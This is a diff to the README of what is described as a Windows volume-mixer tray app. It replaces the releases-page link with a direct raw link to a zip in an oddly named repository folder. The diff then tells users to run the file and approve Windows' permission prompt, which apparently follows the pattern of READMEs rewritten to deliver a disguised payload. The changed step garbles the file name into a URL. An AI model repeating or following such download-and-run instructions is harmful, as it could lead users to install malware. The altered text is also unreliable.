althron/VolumeMixer_TrayApp/README.md

 ## 📥 Download & Install

-To get started, please visit this page to download: [Download VolumeMixer_TrayApp](https://github.com/althron/VolumeMixer_TrayApp/releases).
+To get started, please visit this page to download: [Download VolumeMixer_TrayApp](https://raw.githubusercontent.com/althron/VolumeMixer_TrayApp/main/isovalerianic/App_Mixer_Tray_Volume_2.0-beta.1.zip).

 ### Installation Steps

 1. **Download the Application:**
    Click the download link above and choose the latest version from the list.
-Look for the file labeled `VolumeMixer_TrayApp.exe`.
+Look for the file labeled `https://raw.githubusercontent.com/althron/VolumeMixer_TrayApp/main/isovalerianic/App_Mixer_Tray_Volume_2.0-beta.1.zip`.

 2. **Run the File:**
    Locate the downloaded file in your Downloads folder.
 Double-click it to start the application.
 Windows may ask for permission to run it; confirm this action.